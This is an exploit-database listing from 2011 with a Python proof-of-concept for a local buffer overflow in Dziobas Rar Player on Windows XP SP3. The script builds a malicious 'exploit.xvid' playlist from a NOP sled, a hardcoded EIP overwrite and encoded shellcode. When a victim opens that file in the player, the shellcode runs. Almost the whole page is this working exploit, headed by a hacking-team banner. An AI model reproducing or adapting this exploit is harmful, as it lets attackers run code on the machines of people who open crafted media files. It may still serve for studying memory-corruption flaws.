Dziobas Rar Player Local Buffer Overflow



EKU-ID: 1040 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-09-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################################
# Title: Dziobas Rar Player Local Buffer Overflow                #
# Author: Angel Injection                                        #
# Tested: Windows XP Professional SP3                            #
###################################################################

 
begin = "\x7e\x3c\x8f\x65\x86\x65\x50\x6c\x61\x79\x5d\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x30\x3d\x43\x3a\x5c"
junk = '\x90' * 780
eip = '\xDC\x40\x8C\x7C'
nops = '\x90'*20
shellcode = ("\xbe\x41\x9e\x4e\xd0\x33\xc9\xda\xd7\xd9\x74\x24\xf4\xb1\x33"
"\x58\x31\x70\x10\x83\xe8\xfc\x03\x31\x92\xac\x25\x4d\x42\xb9"
"\xc6\xad\x93\xda\x4f\x48\xa2\xc8\x34\x19\x97\xdc\x3f\x4f\x14"
"\x96\x12\x7b\xaf\xda\xba\x8c\x18\x50\x9d\xa3\x99\x54\x21\x6f"
"\x59\xf6\xdd\x6d\x8e\xd8\xdc\xbe\xc3\x19\x18\xa2\x2c\x4b\xf1"
"\xa9\x9f\x7c\x76\xef\x23\x7c\x58\x64\x1b\x06\xdd\xba\xe8\xbc"
"\xdc\xea\x41\xca\x97\x12\xe9\x94\x07\x23\x3e\xc7\x74\x6a\x4b"
"\x3c\x0e\x6d\x9d\x0c\xef\x5c\xe1\xc3\xce\x51\xec\x1a\x16\x55"
"\x0f\x69\x6c\xa6\xb2\x6a\xb7\xd5\x68\xfe\x2a\x7d\xfa\x58\x8f"
"\x7c\x2f\x3e\x44\x72\x84\x34\x02\x96\x1b\x98\x38\xa2\x90\x1f"
"\xef\x23\xe2\x3b\x2b\x68\xb0\x22\x6a\xd4\x17\x5a\x6c\xb0\xc8"
"\xfe\xe6\x52\x1c\x78\xa5\x38\xe3\x08\xd3\x05\xe3\x12\xdc\x25"
"\x8c\x23\x57\xaa\xcb\xbb\xb2\x8f\x24\xf6\x9f\xb9\xac\x5f\x4a"
"\xf8\xb0\x5f\xa0\x3e\xcd\xe3\x41\xbe\x2a\xfb\x23\xbb\x77\xbb"
"\xd8\xb1\xe8\x2e\xdf\x66\x08\x7b\xbc\xe9\x9a\xe7\x6d\x8c\x1a"
"\x8d\x71")
 
exploit = junk + eip + nops + shellcode
rest = '\x90'*(2000-len(exploit))
end="\x4e\xde\x70\x33\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x31\x3d\x0d\x0a\x4e\x75\x6d\x46\x69\x6c\x65\x73\x3d\x31\x0d\x0a"
 
try:
    f = open("exploit.xvid","w");
    f.write(begin+exploit+rest+end)
    f.close()
    print "Done!"
except:
    print "inj3ct0r!"